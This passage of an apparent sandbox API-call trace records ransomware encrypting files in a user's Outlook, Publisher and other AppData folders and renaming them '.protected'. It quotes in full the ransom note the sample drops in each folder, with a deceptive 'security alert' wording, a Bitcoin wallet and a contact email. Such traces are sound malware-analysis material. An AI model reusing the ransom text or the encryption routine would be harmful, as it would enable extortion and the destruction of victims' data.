halpmcxz\\appdata\\local\\microsoft\\outlook\\outlook.sharing.xml.obi.protected")) returned 1 [0085.213] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0085.213] lstrcmpiW (lpString1="RoamCache", lpString2="Windows") returned -1 [0085.213] lstrcmpiW (lpString1="RoamCache", lpString2="Program Files") returned 1 [0085.213] lstrcmpiW (lpString1="RoamCache", lpString2="Program Files (x86)") returned 1 [0085.213] lstrcmpiW (lpString1="RoamCache", lpString2="$Recycle.bin") returned 1 [0085.213] lstrcmpiW (lpString1="RoamCache", lpString2="System Volume Information") returned -1 [0085.213] wnsprintfW (in: pszDest=0x504c48, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Outlook\\RoamCache") returned 75 [0085.213] lstrcmpW (lpString1="RoamCache", lpString2=".") returned 1 [0085.213] lstrcmpW (lpString1="RoamCache", lpString2="..") returned 1 [0085.213] wnsprintfW (in: pszDest=0x514c90, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Outlook\\RoamCache\\*") returned 77 [0085.213] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Outlook\\RoamCache\\*", lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 0x47ba90 [0085.213] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0085.213] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0085.213] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0085.213] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0085.213] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0085.213] wnsprintfW (in: pszDest=0x514c90, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Outlook\\RoamCache\\.") returned 77 [0085.213] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0085.213] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0085.213] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0085.213] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0085.213] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0085.213] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0085.213] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0085.213] wnsprintfW (in: pszDest=0x514c90, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Outlook\\RoamCache\\..") returned 78 [0085.214] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0085.214] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0085.214] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0085.214] lstrcmpiW (lpString1="Stream_ContactPrefs_2_F230E11936B7D740A008FFC660E83C71.dat", lpString2="Windows") returned -1 [0085.214] lstrcmpiW (lpString1="Stream_ContactPrefs_2_F230E11936B7D740A008FFC660E83C71.dat", lpString2="Program Files") returned 1 [0085.214] lstrcmpiW (lpString1="Stream_ContactPrefs_2_F230E11936B7D740A008FFC660E83C71.dat", lpString2="Program Files (x86)") returned 1 [0085.214] lstrcmpiW (lpString1="Stream_ContactPrefs_2_F230E11936B7D740A008FFC660E83C71.dat", lpString2="$Recycle.bin") returned 1 [0085.214] lstrcmpiW (lpString1="Stream_ContactPrefs_2_F230E11936B7D740A008FFC660E83C71.dat", lpString2="System Volume Information") returned -1 [0085.214] wnsprintfW (in: pszDest=0x514c90, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Outlook\\RoamCache\\Stream_ContactPrefs_2_F230E11936B7D740A008FFC660E83C71.dat") returned 134 [0085.214] StrStrIW (lpFirst="Stream_ContactPrefs_2_F230E11936B7D740A008FFC660E83C71.dat", lpSrch=".protected") returned 0x0 [0085.214] lstrcmpW (lpString1="Stream_ContactPrefs_2_F230E11936B7D740A008FFC660E83C71.dat", lpString2="RESTORE_FILES.txt") returned 1 [0085.214] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0085.214] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e794*=0x30) returned 1 [0085.214] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Outlook\\RoamCache\\Stream_ContactPrefs_2_F230E11936B7D740A008FFC660E83C71.dat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\outlook\\roamcache\\stream_contactprefs_2_f230e11936b7d740a008ffc660e83c71.dat"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0085.214] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Outlook\\RoamCache\\Stream_ContactPrefs_2_F230E11936B7D740A008FFC660E83C71.dat") returned 134 [0085.214] StrStrW (lpFirst="Stream_ContactPrefs_2_F230E11936B7D740A008FFC660E83C71.dat", lpSrch=".txt") returned 0x0 [0085.215] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Outlook\\RoamCache\\Stream_ContactPrefs_2_F230E11936B7D740A008FFC660E83C71.dat") returned 134 [0085.215] StrStrW (lpFirst="Stream_ContactPrefs_2_F230E11936B7D740A008FFC660E83C71.dat", lpSrch=".rar") returned 0x0 [0085.215] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Outlook\\RoamCache\\Stream_ContactPrefs_2_F230E11936B7D740A008FFC660E83C71.dat") returned 134 [0085.215] StrStrW (lpFirst="Stream_ContactPrefs_2_F230E11936B7D740A008FFC660E83C71.dat", lpSrch=".zip") returned 0x0 [0085.215] ReadFile (in: hFile=0x150, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295e7b4*=0x104, lpOverlapped=0x0) returned 1 [0085.216] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0xfffffefc, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0085.216] WriteFile (in: hFile=0x150, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x104, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295e7b4*=0x104, lpOverlapped=0x0) returned 1 [0085.216] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0085.216] WriteFile (in: hFile=0x150, lpBuffer=0x295e78c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x295e78c*, lpNumberOfBytesWritten=0x295e7b4*=0x4, lpOverlapped=0x0) returned 1 [0085.216] WriteFile (in: hFile=0x150, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e7b4*=0x30, lpOverlapped=0x0) returned 1 [0085.216] CloseHandle (hObject=0x150) returned 1 [0085.217] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Outlook\\RoamCache\\Stream_ContactPrefs_2_F230E11936B7D740A008FFC660E83C71.dat.protected") returned 144 [0085.217] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Outlook\\RoamCache\\Stream_ContactPrefs_2_F230E11936B7D740A008FFC660E83C71.dat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\outlook\\roamcache\\stream_contactprefs_2_f230e11936b7d740a008ffc660e83c71.dat"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Outlook\\RoamCache\\Stream_ContactPrefs_2_F230E11936B7D740A008FFC660E83C71.dat.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\outlook\\roamcache\\stream_contactprefs_2_f230e11936b7d740a008ffc660e83c71.dat.protected")) returned 1 [0085.218] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 0 [0085.218] FindClose (in: hFindFile=0x47ba90 | out: hFindFile=0x47ba90) returned 1 [0085.218] wnsprintfW (in: pszDest=0x514c90, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Outlook\\RoamCache\\RESTORE_FILES.txt") returned 93 [0085.218] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Outlook\\RoamCache\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\outlook\\roamcache\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x14c [0085.225] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0085.225] WriteFile (in: hFile=0x14c, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295e7b4*=0x53d, lpOverlapped=0x0) returned 1 [0085.226] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0085.226] WriteFile (in: hFile=0x14c, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295e7b4*=0x2ac, lpOverlapped=0x0) returned 1 [0085.226] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0085.226] WriteFile (in: hFile=0x14c, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295e7b4*=0xb1, lpOverlapped=0x0) returned 1 [0085.226] CloseHandle (hObject=0x14c) returned 1 [0085.228] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 0 [0085.228] FindClose (in: hFindFile=0x47ba50 | out: hFindFile=0x47ba50) returned 1 [0085.228] wnsprintfW (in: pszDest=0x504c48, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Outlook\\RESTORE_FILES.txt") returned 83 [0085.228] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Outlook\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\outlook\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd8 [0085.230] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0085.230] WriteFile (in: hFile=0xd8, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295ea24*=0x53d, lpOverlapped=0x0) returned 1 [0085.231] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0085.231] WriteFile (in: hFile=0xd8, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295ea24*=0x2ac, lpOverlapped=0x0) returned 1 [0085.231] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0085.231] WriteFile (in: hFile=0xd8, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295ea24*=0xb1, lpOverlapped=0x0) returned 1 [0085.231] CloseHandle (hObject=0xd8) returned 1 [0085.231] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0085.231] lstrcmpiW (lpString1="Publisher", lpString2="Windows") returned -1 [0085.231] lstrcmpiW (lpString1="Publisher", lpString2="Program Files") returned 1 [0085.231] lstrcmpiW (lpString1="Publisher", lpString2="Program Files (x86)") returned 1 [0085.231] lstrcmpiW (lpString1="Publisher", lpString2="$Recycle.bin") returned 1 [0085.231] lstrcmpiW (lpString1="Publisher", lpString2="System Volume Information") returned -1 [0085.231] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Publisher") returned 67 [0085.231] lstrcmpW (lpString1="Publisher", lpString2=".") returned 1 [0085.231] lstrcmpW (lpString1="Publisher", lpString2="..") returned 1 [0085.231] wnsprintfW (in: pszDest=0x504c48, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Publisher\\*") returned 69 [0085.232] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Publisher\\*", lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 0x47ba50 [0085.247] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0085.247] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0085.247] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0085.247] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0085.247] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0085.247] wnsprintfW (in: pszDest=0x504c48, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Publisher\\.") returned 69 [0085.247] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0085.247] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0085.247] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0085.247] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0085.247] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0085.247] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0085.247] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0085.247] wnsprintfW (in: pszDest=0x504c48, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Publisher\\..") returned 70 [0085.247] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0085.247] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0085.247] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 0 [0085.247] FindClose (in: hFindFile=0x47ba50 | out: hFindFile=0x47ba50) returned 1 [0085.247] wnsprintfW (in: pszDest=0x504c48, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Publisher\\RESTORE_FILES.txt") returned 85 [0085.247] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Publisher\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\publisher\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd8 [0085.248] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0085.248] WriteFile (in: hFile=0xd8, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295ea24*=0x53d, lpOverlapped=0x0) returned 1 [0085.249] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0085.249] WriteFile (in: hFile=0xd8, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295ea24*=0x2ac, lpOverlapped=0x0) returned 1 [0085.249] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0085.249] WriteFile (in: hFile=0xd8, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295ea24*=0xb1, lpOverlapped=0x0) returned 1 [0085.249] CloseHandle (hObject=0xd8) returned 1 [0085.249] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0085.249] lstrcmpiW (lpString1="TaskSchedulerConfig", lpString2="Windows") returned -1 [0085.249] lstrcmpiW (lpString1="TaskSchedulerConfig", lpString2="Program Files") returned 1 [0085.249] lstrcmpiW (lpString1="TaskSchedulerConfig", lpString2="Program Files (x86)") returned 1 [0085.249] lstrcmpiW (lpString1="TaskSchedulerConfig", lpString2="$Recycle.bin") returned 1 [0085.249] lstrcmpiW (lpString1="TaskSchedulerConfig", lpString2="System Volume Information") returned 1 [0085.249] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\TaskSchedulerConfig") returned 77 [0085.249] lstrcmpW (lpString1="TaskSchedulerConfig", lpString2=".") returned 1 [0085.250] lstrcmpW (lpString1="TaskSchedulerConfig", lpString2="..") returned 1 [0085.250] wnsprintfW (in: pszDest=0x504c48, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\TaskSchedulerConfig\\*") returned 79 [0085.250] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\TaskSchedulerConfig\\*", lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 0x47ba50 [0085.250] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0085.250] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0085.250] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0085.250] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0085.250] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0085.250] wnsprintfW (in: pszDest=0x504c48, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\TaskSchedulerConfig\\.") returned 79 [0085.250] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0085.250] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0085.250] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0085.250] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0085.250] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0085.250] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0085.251] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0085.251] wnsprintfW (in: pszDest=0x504c48, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\TaskSchedulerConfig\\..") returned 80 [0085.251] lstrcmpW 